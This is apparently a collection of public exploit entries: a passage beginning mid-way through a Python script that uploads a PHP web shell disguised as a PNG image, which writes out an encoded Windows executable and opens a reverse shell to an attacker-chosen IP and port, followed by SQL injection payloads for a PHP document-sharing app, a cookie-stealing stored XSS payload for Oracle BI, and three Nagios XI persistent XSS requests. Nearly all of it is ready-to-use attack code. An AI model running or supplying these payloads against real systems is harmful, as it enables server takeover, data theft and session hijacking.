C6S0HQBE7X/EvkBjzZ+wSjQu+RNWj8bG9v++bjOK30O1H9XnqGJvAwD99pu5eW8t+631fGsjQ2PXh/J8vD1CeDxApspOU8LoMU4KJMZ581H0jRsdHPmWAfAUQhFPkqoUKvO4ABAuhmeeT1yRSClWqQBgg+T10QzFYPRo91vMlUoVab9FYUqxGP3m0FzJ6+TXiQBfokhF//zoHVuRlimG0dozN+f/O7/5vwA="; $evalCode = gzinflate(base64_decode($payload)); $evalArguments = " ".$port." ".$ip; $tmpdir ="C:\\windows\\temp"; chdir($tmpdir); $res .= "Using dir : ".$tmpdir; $filename = "D3fa1t_shell.exe"; $file = fopen($filename, 'wb'); fwrite($file, $evalCode); fclose($file); $path = $filename; $cmd = $path.$evalArguments; $res .= "\n\nExecuting : ".$cmd."\n"; echo $res; $output = system($cmd); ?> """ payload = payload.replace("IIPP", REV_IP) payload = payload.replace("PPOORRTT", REV_PORT) s = requests.Session() def getCookies(): r = s.get(INDEX_PAGE) return r.cookies def login(): cookies = getCookies() data = { "username":USERNAME, "password":PASSWORD, "login":"" } r = s.post(LOGIN_URL, data=data, cookies=cookies) if r.status_code == 200: print("Logged in") return True else: return False def sendPayload(): if login(): global payload payload = bytes(payload, encoding="UTF-8") files = {'photo':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) } data = { "firstname":"a", "lastname":"b", "password":"1", "add":"" } r = s.post(VOTE_URL, data=data, files=files) if r.status_code == 200: print("Poc sent successfully") else: print("Error") def callShell(): r = s.get(CALL_SHELL, verify=False) if r.status_code == 200: print("Shell called check your listiner") print("Start a NC listner on the port you choose above and run...") sendPayload() callShell()

# Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection # Date: 21.01.2021 # Exploit Author: CANKAT ÇAKMAK # Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip # Version: V1.0 # Tested on: Windows 10 #Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection. ---------------------------------------------------- POST /path/login.php HTTP/1.1 Host: test.com Content-Length: 29 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://test.com/path/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 user=%27&pass=%27&login=login ---------------------------------------------------- #PoC: Parameter: user (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user=' AND (SELECT 2047 FROM(SELECT COUNT(*),CONCAT(0x7176706a71,(SELECT (ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)-- HnhM&pass='&login=login

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS # Exploit Author: omurugur # Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html # Version: 11.1.1.7.140715 # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr Stored XSS: “;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))} Vulnerable area = Dashboard - Add New Text

# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting # Date: 1-20-2021 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.5 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI. # Vulnerable Parameter : url # POC # Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload. POST /nagiosxi/tools/mytools.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 145 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1 Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas Upgrade-Insecure-Requests: 1 nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton= ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI. # Vulnerable Parameter : groupID # POC # Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload. POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 186 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td Upgrade-Insecure-Requests: 1 groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI. # Vulnerable Parameter : url # POC # Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload. POST /nagiosxi/ajaxhelper.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 147 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/account/ Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056